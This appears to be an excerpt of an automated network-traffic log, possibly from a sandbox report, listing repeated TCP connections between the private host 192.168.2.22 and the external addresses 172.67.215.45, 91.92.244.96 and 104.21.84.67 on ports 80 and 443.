Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443

Source: global traffic	TCP traffic: 192.168.2.22:49160 -> 91.92.244.96:80
Source: global traffic	TCP traffic: 91.92.244.96:80 -> 192.168.2.22:49160
Source: global traffic	TCP traffic: 192.168.2.22:49160 -> 91.92.244.96:80
Source: global traffic	TCP traffic: 192.168.2.22:49160 -> 91.92.244.96:80
Source: global traffic	TCP traffic: 91.92.244.96:80 -> 192.168.2.22:49160
Source: global traffic	TCP traffic: 91.92.244.96:80 -> 192.168.2.22:49160
Source: global traffic	TCP traffic: 91.92.244.96:80 -> 192.168.2.22:49160
Source: global traffic	TCP traffic: 91.92.244.96:80 -> 192.168.2.22:49160
Source: global traffic	TCP traffic: 91.92.244.96:80 -> 192.168.2.22:49160
Source: global traffic	TCP traffic: 91.92.244.96:80 -> 192.168.2.22:49160
Source: global traffic	TCP traffic: 91.92.244.96:80 -> 192.168.2.22:49160
Source: global traffic	TCP traffic: 91.92.244.96:80 -> 192.168.2.22:49160
Source: global traffic	TCP traffic: 91.92.244.96:80 -> 192.168.2.22:49160
Source: global traffic	TCP traffic: 192.168.2.22:49160 -> 91.92.244.96:80
Source: global traffic	TCP traffic: 192.168.2.22:49160 -> 91.92.244.96:80
Source: global traffic	TCP traffic: 91.92.244.96:80 -> 192.168.2.22:49160
Source: global traffic	TCP traffic: 192.168.2.22:49160 -> 91.92.244.96:80
Source: global traffic	TCP traffic: 192.168.2.22:49160 -> 91.92.244.96:80
Source: global traffic	TCP traffic: 192.168.2.22:49160 -> 91.92.244.96:80
Source: global traffic	TCP traffic: 192.168.2.22:49160 -> 91.92.244.96:80
Source: global traffic	TCP traffic: 91.92.244.96:80 -> 192.168.2.22:49160
Source: global traffic	TCP traffic: 91.92.244.96:80 -> 192.168.2.22:49160
Source: global traffic	TCP traffic: 91.92.244.96:80 -> 192.168.2.22:49160
Source: global traffic	TCP traffic: 192.168.2.22:49160 -> 91.92.244.96:80
Source: global traffic	TCP traffic: 91.92.244.96:80 -> 192.168.2.22:49160
Source: global traffic	TCP traffic: 91.92.244.96:80 -> 192.168.2.22:49160
Source: global traffic	TCP traffic: 192.168.2.22:49160 -> 91.92.244.96:80
Source: global traffic	TCP traffic: 192.168.2.22:49160 -> 91.92.244.96:80
Source: global traffic	TCP traffic: 91.92.244.96:80 -> 192.168.2.22:49160
Source: global traffic	TCP traffic: 91.92.244.96:80 -> 192.168.2.22:49160
Source: global traffic	TCP traffic: 91.92.244.96:80 -> 192.168.2.22:49160
Source: global traffic	TCP traffic: 192.168.2.22:49160 -> 91.92.244.96:80
Source: global traffic	TCP traffic: 192.168.2.22:49160 -> 91.92.244.96:80
Source: global traffic	TCP traffic: 192.168.2.22:49160 -> 91.92.244.96:80
Source: global traffic	TCP traffic: 192.168.2.22:49160 -> 91.92.244.96:80
Source: global traffic	TCP traffic: 91.92.244.96:80 -> 192.168.2.22:49160
Source: global traffic	TCP traffic: 91.92.244.96:80 -> 192.168.2.22:49160
Source: global traffic	TCP traffic: 192.168.2.22:49160 -> 91.92.244.96:80
Source: global traffic	TCP traffic: 91.92.244.96:80 -> 192.168.2.22:49160
Source: global traffic	TCP traffic: 192.168.2.22:49160 -> 91.92.244.96:80
Source: global traffic	TCP traffic: 91.92.244.96:80 -> 192.168.2.22:49160
Source: global traffic	TCP traffic: 192.168.2.22:49160 -> 91.92.244.96:80
Source: global traffic	TCP traffic: 91.92.244.96:80 -> 192.168.2.22:49160
Source: global traffic	TCP traffic: 192.168.2.22:49160 -> 91.92.244.96:80
Source: global traffic	TCP traffic: 91.92.244.96:80 -> 192.168.2.22:49160
Source: global traffic	TCP traffic: 192.168.2.22:49160 -> 91.92.244.96:80
Source: global traffic	TCP traffic: 91.92.244.96:80 -> 192.168.2.22:49160
Source: global traffic	TCP traffic: 192.168.2.22:49160 -> 91.92.244.96:80
Source: global traffic	TCP traffic: 91.92.244.96:80 -> 192.168.2.22:49160
Source: global traffic	TCP traffic: 192.168.2.22:49160 -> 91.92.244.96:80
Source: global traffic	TCP traffic: 91.92.244.96:80 -> 192.168.2.22:49160
Source: global traffic	TCP traffic: 192.168.2.22:49160 -> 91.92.244.96:80
Source: global traffic	TCP traffic: 91.92.244.96:80 -> 192.168.2.22:49160
Source: global traffic	TCP traffic: 192.168.2.22:49160 -> 91.92.244.96:80
Source: global traffic	TCP traffic: 91.92.244.96:80 -> 192.168.2.22:49160
Source: global traffic	TCP traffic: 192.168.2.22:49160 -> 91.92.244.96:80
Source: global traffic	TCP traffic: 91.92.244.96:80 -> 192.168.2.22:49160
Source: global traffic	TCP traffic: 192.168.2.22:49160 -> 91.92.244.96:80
Source: global traffic	TCP traffic: 192.168.2.22:49160 -> 91.92.244.96:80
Source: global traffic	TCP traffic: 192.168.2.22:49160 -> 91.92.244.96:80
Source: global traffic	TCP traffic: 91.92.244.96:80 -> 192.168.2.22:49160
Source: global traffic	TCP traffic: 91.92.244.96:80 -> 192.168.2.22:49160
Source: global traffic	TCP traffic: 91.92.244.96:80 -> 192.168.2.22:49160
Source: global traffic	TCP traffic: 91.92.244.96:80 -> 192.168.2.22:49160
Source: global traffic	TCP traffic: 91.92.244.96:80 -> 192.168.2.22:49160
Source: global traffic	TCP traffic: 192.168.2.22:49160 -> 91.92.244.96:80
Source: global traffic	TCP traffic: 91.92.244.96:80 -> 192.168.2.22:49160
Source: global traffic	TCP traffic: 91.92.244.96:80 -> 192.168.2.22:49160
Source: global traffic	TCP traffic: 192.168.2.22:49160 -> 91.92.244.96:80
Source: global traffic	TCP traffic: 91.92.244.96:80 -> 192.168.2.22:49160
Source: global traffic	TCP traffic: 192.168.2.22:49160 -> 91.92.244.96:80
Source: global traffic	TCP traffic: 192.168.2.22:49160 -> 91.92.244.96:80
Source: global traffic	TCP traffic: 91.92.244.96:80 -> 192.168.2.22:49160
Source: global traffic	TCP traffic: 91.92.244.96:80 -> 192.168.2.22:49160
Source: global traffic	TCP traffic: 192.168.2.22:49160 -> 91.92.244.96:80
Source: global traffic	TCP traffic: 192.168.2.22:49160 -> 91.92.244.96:80
Source: global traffic	TCP traffic: 91.92.244.96:80 -> 192.168.2.22:49160
Source: global traffic	TCP traffic: 91.92.244.96:80 -> 192.168.2.22:49160
Source: global traffic	TCP traffic: 192.168.2.22:49160 -> 91.92.244.96:80
Source: global traffic	TCP traffic: 192.168.2.22:49160 -> 91.92.244.96:80
Source: global traffic	TCP traffic: 192.168.2.22:49160 -> 91.92.244.96:80
Source: global traffic	TCP traffic: 91.92.244.96:80 -> 192.168.2.22:49160
Source: global traffic	TCP traffic: 91.92.244.96:80 -> 192.168.2.22:49160
Source: global traffic	TCP traffic: 91.92.244.96:80 -> 192.168.2.22:49160
Source: global traffic	TCP traffic: 91.92.244.96:80 -> 192.168.2.22:49160
Source: global traffic	TCP traffic: 91.92.244.96:80 -> 192.168.2.22:49160
Source: global traffic	TCP traffic: 192.168.2.22:49160 -> 91.92.244.96:80
Source: global traffic	TCP traffic: 91.92.244.96:80 -> 192.168.2.22:49160
Source: global traffic	TCP traffic: 192.168.2.22:49160 -> 91.92.244.96:80
Source: global traffic	TCP traffic: 91.92.244.96:80 -> 192.168.2.22:49160
Source: global traffic	TCP traffic: 91.92.244.96:80 -> 192.168.2.22:49160
Source: global traffic	TCP traffic: 192.168.2.22:49160 -> 91.92.244.96:80
Source: global traffic	TCP traffic: 91.92.244.96:80 -> 192.168.2.22:49160
Source: global traffic	TCP traffic: 192.168.2.22:49160 -> 91.92.244.96:80
Source: global traffic	TCP traffic: 91.92.244.96:80 -> 192.168.2.22:49160
Source: global traffic	TCP traffic: 91.92.244.96:80 -> 192.168.2.22:49160
Source: global traffic	TCP traffic: 192.168.2.22:49160 -> 91.92.244.96:80
Source: global traffic	TCP traffic: 192.168.2.22:49160 -> 91.92.244.96:80
Source: global traffic	TCP traffic: 91.92.244.96:80 -> 192.168.2.22:49160
Source: global traffic	TCP traffic: 91.92.244.96:80 -> 192.168.2.22:49160
Source: global traffic	TCP traffic: 192.168.2.22:49160 -> 91.92.244.96:80
Source: global traffic	TCP traffic: 192.168.2.22:49160 -> 91.92.244.96:80
Source: global traffic	TCP traffic: 192.168.2.22:49160 -> 91.92.244.96:80
Source: global traffic	TCP traffic: 192.168.2.22:49160 -> 91.92.244.96:80
Source: global traffic	TCP traffic: 192.168.2.22:49160 -> 91.92.244.96:80
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 91.92.244.96:80
Source: global traffic	TCP traffic: 91.92.244.96:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 91.92.244.96:80
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 91.92.244.96:80
Source: global traffic	TCP traffic: 91.92.244.96:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 91.92.244.96:80
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 91.92.244.96:80
Source: global traffic	TCP traffic: 91.92.244.96:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 91.92.244.96:80
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 91.92.244.96:80
Source: global traffic	TCP traffic: 91.92.244.96:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 91.92.244.96:80
Source: global traffic	TCP traffic: 91.92.244.96:80 -> 192.168.2.22:49160
Source: global traffic	TCP traffic: 192.168.2.22:49160 -> 91.92.244.96:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 91.92.244.96:80
Source: global traffic	TCP traffic: 91.92.244.96:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 91.92.244.96:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 91.92.244.96:80
Source: global traffic	TCP traffic: 91.92.244.96:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 91.92.244.96:80
Source: global traffic	TCP traffic: 91.92.244.96:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 91.92.244.96:80
Source: global traffic	TCP traffic: 91.92.244.96:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 91.92.244.96:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 91.92.244.96:80
Source: global traffic	TCP traffic: 91.92.244.96:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 91.92.244.96:80
Source: global traffic	TCP traffic: 91.92.244.96:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 91.92.244.96:80
Source: global traffic	TCP traffic: 91.92.244.96:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 91.92.244.96:80
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 91.92.244.96:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 91.92.244.96:80
Source: global traffic	TCP traffic: 91.92.244.96:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 91.92.244.96:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 91.92.244.96:80
Source: global traffic	TCP traffic: 91.92.244.96:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 91.92.244.96:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 91.92.244.96:80
Source: global traffic	TCP traffic: 91.92.244.96:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 91.92.244.96:80
Source: global traffic	TCP traffic: 91.92.244.96:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 91.92.244.96:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 91.92.244.96:80
Source: global traffic	TCP traffic: 91.92.244.96:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 91.92.244.96:80
Source: global traffic	TCP traffic: 91.92.244.96:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 91.92.244.96:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 91.92.244.96:80
Source: global traffic	TCP traffic: 91.92.244.96:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 91.92.244.96:80
Source: global traffic	TCP traffic: 91.92.244.96:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 91.92.244.96:80
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 91.92.244.96:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 91.92.244.96:80
Source: global traffic	TCP traffic: 91.92.244.96:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 91.92.244.96:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 91.92.244.96:80
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 91.92.244.96:80
Source: global traffic	TCP traffic: 91.92.244.96:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 91.92.244.96:80
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 91.92.244.96:80
Source: global traffic	TCP traffic: 91.92.244.96:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 91.92.244.96:80
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 91.92.244.96:80
Source: global traffic	TCP traffic: 91.92.244.96:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 91.92.244.96:80
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 91.92.244.96:80
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 104.21.84.67:80
Source: global traffic	TCP traffic: 104.21.84.67:80 -> 192.168.2.22:49167
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 104.21.84.67:80
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 104.21.84.67:80
Source: global traffic	TCP traffic: 104.21.84.67:80 -> 192.168.2.22:49167
Source: global traffic	TCP traffic: 104.21.84.67:80 -> 192.168.2.22:49167
Source: global traffic	TCP traffic: 104.21.84.67:80 -> 192.168.2.22:49167
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 104.21.84.67:80
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 104.21.84.67:80
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.21.84.67:443
Source: global traffic	TCP traffic: 104.21.84.67:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.21.84.67:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.21.84.67:443
Source: global traffic	TCP traffic: 104.21.84.67:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 104.21.84.67:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.21.84.67:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.21.84.67:443
Source: global traffic	TCP traffic: 104.21.84.67:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 104.21.84.67:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 91.92.244.96:80
Source: global traffic	TCP traffic: 104.21.84.67:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.21.84.67:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.21.84.67:443
Source: global traffic	TCP traffic: 104.21.84.67:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 91.92.244.96:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 91.92.244.96:80
Source: global traffic	TCP traffic: 104.21.84.67:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 104.21.84.67:443 -> 192.168.2.22:49168
